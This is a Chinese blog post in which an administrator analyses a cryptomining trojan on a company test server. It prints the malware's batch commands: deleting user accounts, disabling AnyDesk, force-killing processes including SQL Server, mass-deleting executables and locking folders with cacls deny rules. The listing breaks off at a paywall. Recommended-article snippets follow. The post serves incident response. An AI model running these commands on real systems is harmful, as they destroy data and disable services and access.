一次挖矿木马分析

最新推荐文章于 2021-12-21 23:47:42 发布
最新推荐文章于 2021-12-21 23:47:42 发布
阅读量1.6k 收藏
点赞数
分类专栏: 恶意程序 文章标签: 挖矿 木马 恶意程序
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zero_moment/article/details/103207705
版权

公司测试服务器远程卡顿,VSS无法打开,360杀毒软件失灵,MSSQL无法连接,密码被修改过,重启后无任何显著可用的效果,于是乎查系统进程、系统日志、计划任务等,发现计划任务中出现了一些可疑的任务,任务操作是指向一些bat或者exe,MSSQL代理作业中也出现了十多个可疑的作业,通过分析后发现是中了挖矿木马。通过分析发现该恶意程序做了底下这些操作:

::删除用户,这可能是感染时候建的用户,也可能是其他竞品遗留下来的用户
net1 user mm123$ /del&net1 user admin$ /del&net1 user sysadm05 /del
 
::停止并禁用AnyDesk服务,被感染计算机并未发现这个服务,应该是部署anydesk远程用的
net stop AnyDesk&sc config AnyDesk start= disabled
 
::设置文件为系统只读、隐藏属性,文件较多
attrib -s -h -r C:\Users\Default\AppData\Local\Temp\*.exe&attrib -s -h -r C:\Users\Default\AppData\Roaming\Tempo\*.exe&attrib -s -h -r C:\Users\Default\AppData\Roaming\*.exe
attrib -s -h -r C:\Users\asp\AppData\Local\Temp\*.exe&attrib -s -h -r C:\Users\asp\AppData\Roaming\Tempo\*.exe&attrib -s -h -r C:\Users\asp\AppData\Roaming\*.exe
attrib -s -h -r C:\Users\administrator\AppData\Local\Temp\*.exe&attrib -s -h -r C:\Users\administrator\AppData\Roaming\Tempo\*.exe&attrib -s -h -r C:\Users\administrator\AppData\Roaming\*.exe
 
::杀掉这些进程,有些看起来像是系统进程,有些可能是竞品进程
taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.exe /im win1ogins.exe /im lsaus.exe /im lsars.exe /im lsacs.exe /im regedit.exe /im lsmsm.exe /im v5.exe /im anydesk.exe /im sqler.exe /im sqlservr.exe /im NsCpuCNMiner64.exe /im NsCpuCNMiner32.exe /im tlscntr.exe /im eter.exe /im lsmo.exe /im lsarr.exe /im convert.exe /im WinSCV.exe /im ctfmonc.exe /im lsmose.exe /im svhost.exe /im secscan.exe /im wuauser.exe /im splwow64.exe /im boy.exe /IM powered.EXE /im systems.exe /im acnom.exe /im regdrv.exe /im mscsuscr.exe /im Pviunc.exe /im Bllianc.exe /im st.exe /im nvidia_update.exe /im dether.exe /im buff2.exe /im a.exe /im lacas.exe
 
::删掉部分文件,设置权限
del c:\windows\temp\*.exe&del c:\windows\temp\king.exe&del c:\windows\temp\name.exe&del c:\windows\temp\doc.exe&del c:\windows\temp\wodCmdTerm.exe&del C:\Progra~1\Common~1\conime.exe&del "C:\Program Files (x86)\Common Files\conime.exe"&del C:\WINDOWS\Help\win1ogins.exe&del C:\Windows\Fonts\1\*.exe&del C:\WINDOWS\system\lsars.exe&del "C:\Program Files\RemoteDesk\*.exe"&cacls "C:\Program Files\RemoteDesk\*.exe" /e /d everyone&del "C:\Program Files\RemoteDesk\*.exe"&cacls "C:\Program Files\RemoteDesk\*.exe" /e /d system&del "C:\Program Files\Microsoft SQL Server\110\Shared\*.exe"&cacls "C:\Program Files\Microsoft SQL Server\110\Shared\*.exe" /e /d everyone&del "C:\Program Files\Microsoft SQL Server\110\Shared\*.exe"&cacls "C:\Program Files\Microsoft SQL Server\110\Shared\*.exe" /e /d system&del "C:\Program Files\autodesk\*.exe"&cacls "C:\Program Files\autodesk\*.exe" /e /d everyone&del "C:\Program Files\autodesk\*.exe"&cacls "C:\Program Files\autodesk\*.exe" /e /d system&del  "C:\Program Files\anyDesk\*.exe"&cacls "C:\Program Files\anyDesk\*.exe" /e /d everyone&del  "C:\Program Files\anyDesk\*.exe"&cacls "C:\Program Files\anyDesk\*.exe" /e /d system&del "C:\Program Files (x86)\RemoteDesk\*.exe"&cacls "C:\Program Files (x86)\RemoteDesk\*.exe" /e /d everyone&del "C:\Program Files (x86)\RemoteDesk\*.exe"&cacls "C:\Program Files (x86)\RemoteDesk\*.exe" /e /d system&del "C:\Program Files (x86)\Microsoft SQL Server\110\Shared\*.exe"&cacls "C:\Program Files (x86)\Microsoft SQL Server\110\Shared\*.exe" /e /d everyone&del "C:\Program Files (x86)\Microsoft SQL Server\110\Shared\*.exe"&cacls "C:\Program Files (x86)\Microsoft SQL Server\110\Shared\*.exe" /e /d system&del "C:\Program Files (x86)\autodesk\*.exe"&cacls "C:\Program Files (x86)\autodesk\*.exe" /e /d everyone&del "C:\Program Files (x86)\autodesk\*.exe"&cacls "C:\Program Files (x86)\autodesk\*.exe" /e /d system&del "C:\Program Files (x86)\anydesk\*.exe"&cacls "C:\Program Files (x86)\anydesk\*.exe" /e /d system&del "C:\Program Files (x86)\anydesk\*.exe"&cacls "C:\Program Files (x86)\anydesk\*.exe" /e /d everyone&del c:\DOC001.exe&del c:\users\public\*.exe&del C:\Windows\Temp\WESEES\*.exe&del C:\Users\asp\AppData\Roaming\Tempo\*.exe&del c:\DOC001.exe&del C:\Users\Default\AppData\Roaming\Tempo\*.exe&del C:\Users\administrator\AppData\Roaming\Tempo\*.exe&del C:\Windows\Sys
最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
libgcc-a挖矿木马清除脚本
05-19
用于清楚Xmrig木马变种libgcc_a
windows批处理,dos新版命令之防火墙
gRpc的博客
01-26 1553
net start MpsSvc           //开启服务 sc config MpsSvc start= auto   //开机启动 netsh advfirewall set allprofiles state on     //启用防火墙 netsh advfirewall firewall add rule name="Allow Ping" dir=in protocol=...
笔记本设置WiFi热点命令操作
小旋风
05-01 997
1、查看笔记本是否支持设置WiFi热点功能(大多数支持,可略过),cmd中执行 netsh wlan show drivers 显示结果中有支持的承载网络:是,Next 2、允许承载网络模式并且更改SSID netsh wlan set hostednetwork mode=allow ssid=wifi_idkey=connect_password ...
Windows7建立共享WiFi设置(局域网配置)
J.Anson的博客
08-25 2364
guys都碰到过要共享无线的情况,大多时候guys都会选择下载WiFi共享精灵这类软件。所以今天带领大家走进DOS,在不使用其他软件的情况下配置win7的局域网,将网络共享给手机及其他设备使用。感受高大上命令行操作。
一次mykings&暗云挖矿木马的排查与解决
wanger5354的博客
12-21 2263
微信公众号:运维开发故事,作者:wanger 起因 之前有一台做测试的Windows server2012阿里云服务器的防火墙关掉之后开机总是启动,想了很多办法也没找到原因就提了工单问了售后,结果售后也没发现问题,并提示我服务器中病毒了,赶紧查看云监控,发现有一个进程的CPU一直占用很高,进程名称叫lsma12.exe 排查 删除那个挖矿进程及挖矿的程序,挖矿程序位置在C:/windows/inf/aspnet/lsma12.exe,删除之后重启之后过了12点后又出现了,查看发现存在5个定时任务,删.
中了挖矿病毒
weixin_38946164的博客
06-17 1950
最近一台服务器运行超级慢,任务管理器查看CPU占用100% ,使用autoruns.exe工具查看到异常任务和进程。 打开文件路径还发现以下文件,config.json , c3a.bat , wina.exe config.json 代码如下: { "api": { "id": null, "worker-id": null }, "http": { "enabled": true, "host": "127
WorkMiner挖矿木马应急处置手册.pdf
07-09
WorkMiner挖矿木马应急处置手册
Scratch挖矿游戏作品:挖矿
03-14
可售出矿石,获得钱币,以购买“稿子”“护盾”等。干货满满,欢迎转载,记得注明原作者。此后仍有各热门或有趣游戏,请关注原作者,且点赞加收藏,记得推荐好友。下载即可玩,快点来下载吧!
Scratch 挖矿游戏:矿工小猫
07-05
角色数量:35,素材数量:805,积木数量:15561,音频数量:55 ...有滚轮切换物品栏、恢复初始设置、呼吸系统和死亡惩罚,屏幕变黄表示你已经缺氧了,如果不喝药或返回地面补充就会饿死! 此后仍有作品或有趣游戏、...
针对挖矿木马的一些基本认识
Macro2的博客
04-26 2944
区块链 什么是挖矿 为啥要挖矿 什么是矿池 什么是挖矿钱包 怎么挖矿 怎么发现和预防 区块链 区块链是一种分布式的数据库,区块链中每一个区块可以用来记录多笔交易数据(如比特币的交易数据,A->B转账1个bit币),多个区块以链条式的方式串联在一起,就可以称为区块链。比特币就是利用区块链技术来实现去中心化。相当于你下载比特币客...
黑客必备的s.exe源码
ASP.NET的博客
08-19 9070
s扫描器源码,知道的人并不会多问什么
永恒之蓝 端口关闭与开启 bat脚本
孤城烟雨话凄凉
05-17 8770
@echo off color 0A title 您正在使用一键关闭危险端口和服务 echo 您正在使用一键关闭危险端口和服务 echo “按任意键继续” pause echo “正在帮您关闭这些危险端口,请稍等” echo “正在开启防火墙服务” net start MpsSvc echo ”正在帮您开启防火墙自启动“ sc config MpsSvc start=
开启服务的命令-Net start命令详解
热门推荐
haiross的专栏
10-22 5万+
开启服务的命令-Net start命令详解  开启服务窗口的命令:开始-运行-cmd-services.msc 本文主要讲开启服务的命令: net start [服务名] -枚举开启的服务(无参数时) 如net start telnet 就启动了telnet服务 net stop [服务名] 可关服务,控制面板的管理工具的服务是一个图形化管理服务的工具。 另外一个启动服务的命令
windows防火墙无法启动0x8007042c解决办法
xnp2010的博客
05-09 3716
windows防火墙无法启动0x8007042c解决办法因为有一天发现wmi provider host这个进程严重占用cpu,在网上搜说是防火墙的问题,当时修改了一下注册表的某个键,果然cpu下去了,但是后来发现edge、搜索框、内置的app都无法使用,切换到微软账户登陆也有问题(除了需要普通本地账户权限,即在users组)。一头雾水找了半天原因,最后发现竟然是防火墙禁用导致的问题。但我已经记不得
通过防火墙入站规则关闭终端不常用端口
hackerie的博客
01-23 3657
操作方法 ver|find /i “5.1” && goto :xp ver|find /i “6.1” && goto :win7 :win7 net start MpsSvc sc config MpsSvc start= auto netsh advfirewall set allprofiles state on net start MpsSvc sc config Mps
关于windows防火墙关不掉解决办法
weixin_30484739的博客
10-01 647
建立一个.bat文件,写以下内容: echo off title 正在启动防火墙服务 sc config MpsSvc start=auto net start MpsSvc pause 至此完毕,重启试试就知道了 转载于:https://www.cnblogs.com/ciscolee/p/7616588.html...
一次被入侵和删除木马程序的经历(转)
极客海哥
11-21 3369
首先剧透一下后门木马如下: (当然这是事后平静下来后慢慢搜出来的,那个时候喝着咖啡感觉像个自由人) 木马名称 Linux.BackDoor.Gates.5 http://forum.antichat.ru/threads/413337/ 首先是下午14点左右有几台服务器出现流量超高,平时只有几百M的流量,那时候发现流量上G了,达到这个量第一感觉就是遭受了DDOS流量攻击
windows挖矿木马
最新发布
09-08
对于 Windows 系统的挖矿木马,以下是一些常见的问题和解决方案: 1. 如何防止 Windows 系统感染挖矿木马? - 安装有效的杀毒软件,并始终保持其更新。 - 避免从不可信的来源下载和安装软件。 - 及时更新 Windows ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值